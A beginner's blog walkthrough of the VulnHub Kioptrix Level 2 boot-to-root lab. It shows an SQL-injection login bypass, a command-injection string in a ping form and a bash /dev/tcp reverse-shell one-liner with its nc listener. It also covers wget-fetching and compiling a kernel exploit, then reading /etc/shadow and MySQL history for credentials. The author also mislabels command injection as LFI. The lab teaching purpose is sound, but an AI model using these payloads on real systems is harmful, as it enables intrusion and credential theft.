VulnHub — Kioptrix Level 2

Hello friends, it’s my Write-up about how to hack Kioptrix machine and get root access (Boot To Root).

At the first and before we beginning I want to say that the Kioptrix machines is considered the easiest machines from VulnHub, this machines is for Beginners, I’m still beginner also :”) So if you don’t know how to solve or deal with Level 1, take a look at this Writeup from me also in an easy way

So after downloading the machine and setup it at VMWare or VirtualBox lets get started…


In this walkthrough we’ll deal with multiple type of vulnerabilities like LFI, SQLi, Privilege escalation, etc

But at the first I want to put my methodology to start with any machine:

0. Recon. or Information gathering (IP’s, MAC addresses, information disclosure, server version, open ports, etc)

  1. Enumeration like SMB, HTTPS, HTTP, etc

2. Exploitation

3. Post-Exploitation

#0 Recon

This step to know more information about the machine like its IP, MAC, Server type, Open ports, System version, etc

At the first you should know the IP address of your machine and you can get it by using ifconfig command in your terminal

IP address from ifconfig

Next I want to know the IP address of the machine so I'll use my own tool NetScanner which written in python 2 and you can download it from here

NetScanner results to get the machine’s IP address

Or you can use the built-in tool with Kali netdiscover but I always use my tool because it return the results in less time than netdiscover

netdiscover results to get the machine’s IP

NetScanner → python -i ip_address_range

Netdiscover → netdiscover -r ip_address_range

Now we know that the IP address of the machine is because of the first 3 IPs is related to the Kali system itself, the difference IP here is the last one, yeah it’s related to our target.

Before go to perform HTTP Enumeration i want to go to Nmap first because it will take a long time so we’ll run it and go to do another scan until it finish. The scan results we’ll analyse it to get any port which may be vulnerable.

Nmap results

You’ll notice that ssh, http, rpcbind, ipp, ssl, https and mysql is open so for me I'll concern more about http, ssh and mysql to start with them. Also you’ll notice that the Linux version is 2.6.x and the Linux_kernel is 2.6.

#1 Enumeration (HTTP)

Go to the browser and search for the IP address of the machine which in my case (It may be different in your network)

The Remote System Administration login panel of the machine’s website

You’ll find a login panel which require username and password and in this case I think about SQLi to break authentication by inserting this payload in the username text area (admin ‘ #)

Try to insert SQLi payload

Let’s see what will happen …

Nice ! It’s worked. So the first thing in this machine is it’s vulnerable by SQL injection in the login page

You’ll notice that it ask you to ping a machine in your network so I'll try to ping the localhost of the machine itself

Nice! It’s worked and already bing to itself, so it may be vulnerable to LFI vulnerability and from it i can read an important files like /etc/passwd or /etc/shadow or anything else

let’s try this by inserting whoami command line to see if I'm a user or a root but to insert multiple commands in the same input you should have to insert ; between them like this( localhost ; whoami )

#2 Exploitation

Privileges escalation

Now we know that until this moment we just a user not a root so we’ll try to perform OS Command Execution if the machine is vulnerable to it by inserting this input (localhost ; bash -i >& /dev/tcp/ 0>& 1) and by using nc we’ll listen to this port for any incoming connection by inserting (nc -lvp 443)

Very Very Nice, it’s vulnerable to OS command injection, note that we now in the terminal of the machine and because it a Linux OS so we’ll use the same Kali command we actually know. If you see the terminal again you will notice this character $ which say we’re still normal user so I'll use this normal user privileges to collect more info about the machine which Nmap and Nikto don’t get back to me.

For Example I'll use this command cat /etc/*elease to know the version of the CentOS (related to http port “Open”)

So the CentOS release is 4.5, good for now. Let’s collect more information about the Linux kernel itself by inserting this command uname -a

The Linux kernel version is 2.6.9–50.

Now we’ll take this information to search about script to exploit the machine from the open ports, we’ll search by using searchsploit tool

Depending on the Linux kernel and the CentOS version we’ll use the script 9545.c, now we’ll try to share this script with the machine and execute it on it, in this way we’ll get the root access.

Start the http sharing server which open in the port 80

To share this script to the machine first copy the script from it’s directory to Kali’s root directory and then go to the machine and change directory to /tmp so you can read and write (have a permission). After change the directory, get the script by wget by this command wget

The next step is to execute the script into the machine like this gcc -o start 9545.c

Bingo ! You’re now have the root privileges

SQL Exploitation

After we have a root access from exploit C script from local machine, we can also get the admins credentials from searching about this data so let’s continue …

Before you get the root access you can’t open /etc/passwd or /etc/shadow to get the username and the password of the users on the system but now you can open it by change directory to /etc and read these files

/etc/shadow and /etc/passwd these files are containing sensitive data about the usernames of the users and there passwords


Note at the end of this file these passwords …

But unfortunaltely this passwords are hashed so you can’t get the original password easily so let’s search about anything else manage us to get these data… but how do you think about SQL ? This machine have a localhost which host the Web Application so do you think it have a database ? Sure ! let’s search about it..

Go to the root and list the directories including the hidden also

Note this hidden file .bash_history which record any command which written in the bash, open it to see its content

Great ! the root had written this command in this machine ( cat .mysql_history ) so let’s go to root directory and search about it there

Great ! we’ve find it :”) Open it to have amazing credentials, Trust ME 😇

See ! Now we’ve a great info from the database ^-^

we’ve database named webapp and tables like users and columns like user and password and it’s values like user=john and password=hiroshima and the user=admin and it’s weird password :)

This data in related to webapp database and this web application is in the localhost on the machine at its directory /var/www/html/

You’ll find 2 files index.php and pinfgit.php, the second one doesn’t have important information as you can so let’s open the first one

Great! As you can see amazing credentials again about the webapp database.

SQL Exploitation

Until now we have a great information and credentials about the database and the user, let’s dump more data by using SQLmap or by manual, I’ll work manually ..

Username=john , Password=hiroshima

this command you can use it to dump all the database by this sequence database → table name → columns → data

At the last screenshot we have the databases so in each one you will dump it to get any other sensitive data

and in the next dump you will type mysql -u john -p — execute=”select * from mysql.user”

user is the table name

mysql is the database name

- u → username

-p → password

Congratulation for the root access Bro ❤

Offensive Security Enthusiast — twitter @eslam3kll

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Convert a Price from USD to EUR in Python

SQL v. Pandas: Basic Syntax Comparison & Cheat Sheet

The Most Common Pitfalls of a Beginner Developer

Building The Trust Network Through Bird Oracles

LeetCode problem #6 — ZigZag Conversion (JavaScript)

Out from the Cold — A Simple Guide To Avoiding Cold Boots by Warming Your AWS Lambda Functions

Understanding lvalues and rvalues in C++ (Part 01)

Strategy to optimize platform cost running on AWS

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Eslam Akl

Eslam Akl

Offensive Security Enthusiast — twitter @eslam3kll

More from Medium

Shibboleth WriteUp - HackTheBox

NMAP commands for scanning remote hosts


CTF Writeup: 1337UP CTF 2022